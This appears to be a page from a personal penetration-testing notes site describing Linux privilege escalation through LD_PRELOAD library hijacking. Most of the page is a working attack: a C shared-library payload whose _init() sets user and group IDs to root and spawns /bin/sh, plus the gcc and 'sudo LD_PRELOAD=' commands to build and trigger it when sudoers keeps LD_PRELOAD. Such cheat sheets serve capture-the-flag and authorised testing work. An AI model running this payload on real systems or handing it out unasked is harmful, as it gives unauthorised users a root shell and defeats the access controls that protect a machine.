xct's notes
Search…
Path Hijacking

LD_PRELOAD

Check if you can write into the path of privileged binaries, you might be able to abuse the library load order. Check wich functions a binary uses via objectdump -T. To use these preload attacks with sudo in /etc/sudoers there must be env_keep += LD_PRELOAD

Preload example payload

1
#include <stdio.h>
2
#include <sys/types.h>
3
#include <stdlib.h>
4
void _init() {
5
unsetenv("LD_PRELOAD");
6
setgid(0);
7
setuid(0);
8
system("/bin/sh");
9
}
Copied!

Compile preload example payload

1
gcc -fPIC -shared -o payload.so payload.c -nostartfiles
2
sudo LD_PRELOAD=/tmp/payload.so <target>
Copied!
When playing with the linker configs run ldconfig afterwards or it wont update the linker cache.
Last modified 1yr ago
Copy link